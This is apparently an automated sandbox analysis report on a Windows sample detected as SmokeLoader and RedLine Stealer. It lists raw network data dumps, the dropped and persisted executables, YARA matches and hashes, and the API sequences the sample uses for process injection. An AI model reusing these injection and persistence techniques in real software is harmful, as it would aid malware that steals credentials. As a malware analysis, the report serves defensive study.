2024-10-12 20:29:01 UTC	8000	IN	Data Raw: 80 a9 14 06 dc b3 44 d6 e5 16 61 04 d0 bf f1 24 db 5e 01 45 81 c1 2b 92 e6 3e d3 85 ec 9a 31 ef de b7 c0 70 43 80 87 5b ed 4b 49 b5 b9 66 d7 5f 24 6c 72 ba 46 f5 76 97 1e 3b fe ee a9 2e df a3 92 4d cd 13 bc 78 3a bd e4 8e ff d5 7a cb c1 64 c1 ef d5 f2 54 6d f8 3a 5e b5 e3 fa 47 ca 76 58 d1 43 bf f0 3a f4 81 fc 9a cd 13 c4 3a 2f 2e 0d fc 4d 33 64 0b f4 71 35 94 f0 55 a0 7f fb ae d5 ca c8 93 47 f2 0e 48 92 ae 75 2d 91 3b 2d cd 69 ea ba c9 10 9b 33 d5 3f 26 91 b4 00 0c ab ae 81 01 61 b8 0e 4e 43 c2 c8 fa dd 11 7d 10 7c f6 d2 3d f3 8a 74 84 73 8a 38 8b 51 1e b9 5b 9d 8e 8f ac 15 0e 00 22 aa 55 8c 45 e6 6c f3 86 68 e1 b4 0c 66 c6 b6 25 3a 70 9b 47 4b 6a c5 df b6 51 c5 4d d4 51 63 f1 03 c8 4e c7 64 f0 c0 b8 2e 48 64 c0 a2 69 ea a6 18 84 1d da 44 5b a8 e1 19 3f Data Ascii: Da$^E+>1pC[KIf_$lrFv;.Mx:zdTm:^GvXC::/.M3dq5UGHu-;-i3?&aNC}\|=ts8Q["UElhf%:pGKjQMQcNd.HdiD[?
2024-10-12 20:29:01 UTC	8000	IN	Data Raw: 0c 74 b8 8f 0c aa 9c cc fe ef 22 7e 3a 89 62 e2 81 2c 48 4a e8 d7 87 b2 dd 9e 85 b9 dd 2a 82 b3 ea f1 45 b0 97 76 fa 99 dc 98 ab b9 67 50 14 4d fa 26 a7 32 4b c1 e4 71 d7 62 d5 fe a0 af 2e 9f 9e ab be 03 22 e5 3a fb 61 0e 0d c5 a6 4e 82 07 43 27 0a 65 a3 0b 94 07 27 5d e6 61 eb 4e 06 10 91 74 06 e7 7d af d6 ec b3 2f be 97 42 c4 db 3b 5e 52 75 f5 98 77 36 a3 8a fd e2 7f 47 6a ef a8 ad 73 87 66 1f ac 9c 3f b1 73 cb bf 2a d5 51 0a 98 8d 62 c0 3a f8 6f 65 7f fa 62 9a 87 15 8c 28 ef 40 2f a0 34 28 20 a7 2c 30 4a fa 3f 30 72 5f 8c ab 91 31 75 fa bc 86 43 17 90 1a d8 43 29 27 54 0e 64 52 c4 55 55 c5 2c 9f f7 08 51 7b f7 fc 59 c6 48 11 7b 6f b1 e8 3d f0 4e 15 32 42 09 8b e9 b2 f1 f7 ca 4b 83 89 7f aa 1d 81 ea fd b0 9f db f3 10 e5 0a 63 60 81 ab 3b 41 b0 8b 4e 03 Data Ascii: t"~:b,HJEvgPM&2Kqb.":aNC'e']aNt}/B;^Ruw6Gjsf?sQb:oeb(@/4( ,0J?0r_1uCC)'TdRUU,Q{YH{o=N2BKc`;AN
2024-10-12 20:29:01 UTC	8000	IN	Data Raw: 29 3b 52 75 45 38 61 da f5 8b 4b 1b 49 04 39 48 65 38 b2 34 2a 88 7b 38 83 49 ff 73 4f d0 2b e1 e2 45 5a 9d d3 a6 67 63 85 e7 5f 54 4a f3 a0 01 a4 d0 04 1b ea e0 ca ef 02 f6 16 f6 6e f5 0c 74 f0 e5 0b 3d cd 58 73 c8 3d ff 47 50 25 79 61 74 09 6e 68 c2 9e 97 88 99 ce 46 98 24 73 03 46 dc 30 24 1e 0a d5 e0 54 88 22 ba f7 6c b4 de ed c2 ac f0 fe 7a c7 e3 a6 d0 a5 d0 14 97 a8 09 82 ce 17 78 34 ae a9 a3 67 bf a2 1b 5f 2d be 98 f5 b5 7b 67 a6 32 31 ad 81 eb 4b 35 85 6e 05 d9 02 11 11 41 0f 41 72 78 0d 91 f3 e8 8d e2 0f 7d c4 51 11 b9 f1 ef 9a 7b 31 a4 a6 46 bd 62 93 91 72 a5 30 ad f0 58 12 bd 2b 8d a5 d8 64 d0 b9 8d 4e b5 c4 64 48 72 d2 9b a2 46 3f fb 58 42 a2 4d 65 4a ee 9f 4d 24 c9 68 7e 38 02 cd f2 3e 87 74 38 e2 08 b5 db 69 50 c1 8d c3 a8 79 6c 2e fd 35 9e Data Ascii: );RuE8aKI9He84*{8IsO+EZgc_TJnt=Xs=GP%yatnhF$sF0$T"lzx4g_-{g21K5nAArx}Q{1Fbr0X+dNdHrF?XBMeJM$h~8>t8iPyl.5
2024-10-12 20:29:01 UTC	8000	IN	Data Raw: 58 a8 ea f1 35 7e b4 f4 db 12 c6 82 54 f8 45 ac 48 8d 3b a5 ca 75 c7 7a 4a 57 56 2f 30 aa e7 f7 1c e2 b2 b4 88 52 22 f4 e6 ca 13 7d a8 77 50 62 eb 5a 71 09 e0 08 f7 19 71 d3 40 ac b5 d5 86 2a a0 a1 18 c2 27 3d 8d 29 c4 8d bc f3 b8 49 e5 2b 42 7f 1a ba 2c 14 08 0e 1b 00 46 0c 80 de 9d d8 bb ea cb 51 90 40 0a b0 80 6b 76 3e 77 5b 7c 4a 60 b1 21 68 d6 63 67 07 21 4c 35 a0 9e 4a 5c f5 5a 68 1c d1 d3 91 7a 4d de 12 2f 31 da 50 1a c1 01 dd dd 2f 38 db 1f e1 7a b6 94 c4 26 66 3e e4 42 2b e8 fc a9 1a 91 c3 d9 7b 50 bc 23 24 9e dd 74 92 23 50 45 a0 8f b0 4f 16 2a 67 f7 ef 42 43 17 f2 0d 76 51 d4 52 5b 85 b0 60 53 10 ef ef 27 c5 ae dd f5 d9 8e c2 1d 4b 6f fd d4 18 ee 49 62 9c 7e 16 ab 15 8b 14 b3 26 0c b3 7a ac 8f d9 1b 56 ec 7e 5a 43 9e 5b 68 03 8a bb da 4a 02 3f Data Ascii: X5~TEH;uzJWV/0R"}wPbZqq@'=)I+B,FQ@kv>w[\|J`!hcg!L5J\ZhzM/1P/8z&f>B+{P#$t#PEOgBCvQR[`S'KoIb~&zV~ZC[hJ?
2024-10-12 20:29:01 UTC	8000	IN	Data Raw: 44 40 52 05 3a 72 2f 6e 1b 0e 08 b5 d9 d9 9f 71 d4 47 68 33 1c 5a bc de 17 52 e4 12 b5 9d 6d 77 f7 60 02 46 3c 21 16 db f7 1b 4d 3f 05 3c ad 0f 22 24 8c 8d 47 32 a9 19 0d 8f a2 36 9e fc 72 45 07 cf 5b 55 84 3c de f0 ee 9a 99 0e 24 52 c2 8a 3d 67 6a 26 29 68 1c ac a6 63 38 8e da 40 e2 43 59 b4 22 39 f2 92 ff 4d 65 4f 36 4b 57 8f 10 ec f0 44 c5 25 2b d5 71 d5 7c 17 01 ee 42 10 42 84 31 c1 12 33 9e 97 46 b0 40 93 f7 9e fb c9 0b 85 b0 07 01 d0 bc 00 aa 78 c6 60 4d 11 42 8a 1b d8 08 08 2c 9b 54 6f 53 7a d2 fd 7b e9 fe 76 7b af 59 04 77 4a 74 6c f7 73 ee b1 00 74 d8 9e 6f db 01 3a e9 6b 3e 05 32 13 f8 c7 a9 aa 9b 29 89 02 6d 7b 7d 6f 8e 15 a1 57 ce ba 3f 36 09 c0 87 83 83 f9 f7 76 f7 87 bf c6 ec 19 3c 0a ec 6e 27 d9 20 2f 96 e7 90 40 de aa b7 43 f8 89 c9 ab e2 Data Ascii: D@R:r/nqGh3ZRmw`F<!M?<"$G26rE[U<$R=gj&)hc8@CY"9MeO6KWD%+q\|BB13F@x`MB,ToSz{v{YwJtlsto:k>2)m{}oW?6v<n' /@C

Target ID:	0
Start time:	16:28:02
Start date:	12/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	243'200 bytes
MD5 hash:	F0342947877C844A5C82CB4BB5FDADAD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1818628832.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1818628832.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1818742060.0000000002DB7000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1818859603.0000000002EF1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1818859603.0000000002EF1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1818600751.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	16:28:12
Start date:	12/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	16:28:32
Start date:	12/10/2024
Path:	C:\Users\user\AppData\Roaming\trbwcit
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\trbwcit
Imagebase:	0x400000
File size:	243'200 bytes
MD5 hash:	F0342947877C844A5C82CB4BB5FDADAD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2089545393.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2089545393.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2089476769.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2089645639.0000000002D57000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2089499262.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2089499262.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 37%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	16:29:01
Start date:	12/10/2024
Path:	C:\Users\user\AppData\Local\Temp\565.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\565.exe
Imagebase:	0x400000
File size:	242'688 bytes
MD5 hash:	F42E9B6758241070E7815B8BD1EB8335
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2387106180.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2387169374.0000000002C21000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2387169374.0000000002C21000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2387276728.0000000002C67000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2387127676.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2387127676.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	16:29:28
Start date:	12/10/2024
Path:	C:\Users\user\AppData\Roaming\fgbwcit
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\fgbwcit
Imagebase:	0x400000
File size:	242'688 bytes
MD5 hash:	F42E9B6758241070E7815B8BD1EB8335
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.2686603157.0000000002C37000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000008.00000002.2686820373.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2686854364.0000000002E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2686854364.0000000002E90000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2687018881.0000000003001000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2687018881.0000000003001000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	16:30:01
Start date:	12/10/2024
Path:	C:\Users\user\AppData\Roaming\trbwcit
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\trbwcit
Imagebase:	0x400000
File size:	243'200 bytes
MD5 hash:	F0342947877C844A5C82CB4BB5FDADAD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	16:30:02
Start date:	12/10/2024
Path:	C:\Users\user\AppData\Roaming\fgbwcit
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\fgbwcit
Imagebase:	0x400000
File size:	242'688 bytes
MD5 hash:	F42E9B6758241070E7815B8BD1EB8335
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	29.4%
Signature Coverage:	42.9%
Total number of Nodes:	163
Total number of Limit Nodes:	7

Executed Functions

Function 00415B60 Relevance: 44.0, APIs: 23, Strings: 2, Instructions: 283
filelibrarypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415C32
ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00415C4B
FindAtomW.KERNEL32(00000000), ref: 00415C52
SetConsoleMode.KERNEL32(00000000,00000000), ref: 00415C5A
SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415C72
SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00415C99
MoveFileW.KERNEL32(00000000,00000000), ref: 00415CA1
GetVersionExW.KERNEL32(?), ref: 00415CAE
DisconnectNamedPipe.KERNEL32(?), ref: 00415CC1
ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00415D06
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415D15
LCMapStringA.KERNEL32(00000000,00000000,004173C0,00000000,?,00000000), ref: 00415D2B
PulseEvent.KERNEL32(00000000), ref: 00415D3B
SetCommState.KERNELBASE(00000000,00000000), ref: 00415D64
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415D95
GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415DA6
BuildCommDCBA.KERNEL32(00000000,00000000), ref: 00415DAE
GetTimeFormatW.KERNEL32(00000000,00000000,?,004173EC,?,00000000), ref: 00415DEE
GetFileAttributesA.KERNEL32(00000000), ref: 00415DF5
GetConsoleAliasExesLengthA.KERNEL32 ref: 00415DFB
GetBinaryType.KERNEL32(0041742C,?), ref: 00415E0D
LoadLibraryA.KERNELBASE(00417438), ref: 00415E92

Strings

}$, xrefs: 00415EE7
k`, xrefs: 00415EC3

Memory Dump Source

Source File: 00000000.00000002.1817408197.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_file.jbxd

Similarity

API ID: Console$CommFile$LengthReadStringType$AliasAliasesAtomAttributesBinaryBuildCompareConfigDefaultDisconnectEventExchangeExesFindFormatInterlockedLibraryLoadModeModuleMoveNameNamedOutputPathPipePulseSearchStateTimeVersion
String ID: k`$}$
API String ID: 2545807588-956986773
Opcode ID: c39809a0e87fd44c053065795a214b46b35c2f87788abebbe67deec486c5fac3
Instruction ID: c6a02c0327a8ca2811bf3dc5f08980216b947ce058d02ad4a82b71acd99ee3cb
Opcode Fuzzy Hash: c39809a0e87fd44c053065795a214b46b35c2f87788abebbe67deec486c5fac3
Instruction Fuzzy Hash: 4FA10271802A24DBC720DB64EC48ADB7B79FF89351F41406AF50AA7150DB385A81CFAD

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 02DBAE2E Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02DBAE56
Module32First.KERNEL32(00000000,00000224), ref: 02DBAE76

Memory Dump Source

Source File: 00000000.00000002.1818742060.0000000002DB7000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DB7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2db7000_file.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 174ea6d4b70f6c5ef2006ce62384816aac4a28d51b7e8e4a656c62441995012c
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: CCF09635600711ABD7213BF9A89DBEF76ECEF49724F100528E697911C0DB70EC458A61

Function 02D8003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02D8024D

Strings

kernel32.dll, xrefs: 02D8008F, 02D80095
cess, xrefs: 02D8018D

Memory Dump Source

Source File: 00000000.00000002.1818600751.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: a3dcd30f86fae6a66a967e8b9b219d76427dd2864350c8a661673b37e68e1691
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 9B526875A01229DFDB64DF58C984BA8BBB1BF09305F1480D9E94DAB351DB30AE89CF14

Function 00415792 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(02B18CE8), ref: 004158BF
GetProcAddress.KERNEL32(00000000,0041ACD0), ref: 004158FC
VirtualProtect.KERNELBASE(02B18B2C,02B18CE4,00000040,?), ref: 0041591B

Strings

, xrefs: 00415825

Memory Dump Source

Source File: 00000000.00000002.1817408197.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_file.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
